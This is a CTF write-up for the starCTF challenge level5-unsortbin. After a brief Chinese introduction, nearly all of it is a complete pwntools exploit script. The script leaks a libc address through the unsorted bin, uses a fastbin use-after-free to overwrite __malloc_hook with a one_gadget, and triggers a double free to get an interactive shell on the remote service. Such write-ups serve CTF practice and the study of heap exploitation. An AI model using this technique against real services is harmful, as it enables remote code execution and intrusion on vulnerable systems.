starCTF unsorted bin leak & fastbin attack level5-unsortbin Writeup

UNCTF2020中的babyheap，官方wp用的是unsorted bin attack修改fastbin最大大小。所以特意看了一下这题，结果发现这题是unsorted bin leak，不过不做白不做，花了一个小时做掉了。等一下会找一下unsorted bin attack的题目，待补充……

# -*- coding: utf-8 -*-
from pwn import *
# Log every byte sent and received; useful when the prompt strings below drift.
context.log_level = "debug"

# Target selection: the remote service is used, the local-process line is kept
# for offline runs against the shipped binary.
#r = process('./level5-unsortbin')
REMOTE_HOST, REMOTE_PORT = "pwn.sixstars.team", 22505
r = remote(REMOTE_HOST, REMOTE_PORT)

# Symbol offsets come from the libc shipped with the challenge; the commented
# system path is an alternative build.
elf = ELF('./libc.so.6')
#elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def add_note(size):
    """Pick menu entry 1 and answer the "Size:" prompt with *size*."""
    exchanges = ((">> ", "1"), ("Size:", str(size)))
    for prompt, reply in exchanges:
        r.sendlineafter(prompt, reply)

def show_note(idx):
    """Pick menu entry 2 and answer the "id:" prompt with *idx*."""
    exchanges = ((">> ", "2"), ("id:", str(idx)))
    for prompt, reply in exchanges:
        r.sendlineafter(prompt, reply)

def edit_note(idx, content):
    """Pick menu entry 3, answer the "id:" prompt, then send *content* unchanged."""
    exchanges = ((">> ", "3"), ("id:", str(idx)), ("Content:", content))
    for prompt, reply in exchanges:
        r.sendlineafter(prompt, reply)

def dele_note(idx):
    """Pick menu entry 4 and answer the "id:" prompt with *idx*."""
    exchanges = ((">> ", "4"), ("id:", str(idx)))
    for prompt, reply in exchanges:
        r.sendlineafter(prompt, reply)


# Two notes; the ids used below (0 and 1) are inferred from the later
# dele_note/edit_note calls, the service itself is not visible here.
add_note(200)
add_note(0x68)
# Note 0 is freed and then displayed; the recv() below consumes what is printed.
dele_note(0)
show_note(0)
#main_arena + 0x58 = leak addr
#main_arena - 0x10 = __malloc_hook
#__malloc_hook = leak_addr - 0x68
# Six raw bytes, NUL-padded to eight, unpacked little-endian; the 0x68 is the
# distance worked out in the comment lines above.
# NOTE(review): this is a Python 2 script (print statements below). Under
# Python 3 recv() returns bytes, so the pad would have to be b'\x00'.
malloc_hook_addr = u64(r.recv(6).ljust(8, '\x00')) - 0x68
libc_base = malloc_hook_addr - elf.sym['__malloc_hook']

# Candidate offsets are tied to one specific libc build — presumably the
# ./libc.so.6 loaded above; verify before reusing against another build.
# Why index 2 is the working candidate is not recorded here.
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = libc_base + one[2]
print "__malloc_hook: " + hex(malloc_hook_addr)
print "one_gadget: " + hex(one_gadget)

# Note 1 is freed, then written to while freed; the two allocations that
# follow reuse the same size. Their ids (2 and 3) are inferred from the
# edit_note(3, ...) call below.
dele_note(1)
edit_note(1, p64(malloc_hook_addr - 0x23))
add_note(0x68)
add_note(0x68)

# 0x13 bytes of padding followed by the address computed above.
edit_note(3, 'a' * 0x13 + p64(one_gadget))
#gdb.attach(r)
# Note 1 is freed twice in a row; the script then hands the connection to the user.
dele_note(1)
dele_note(1)
r.interactive()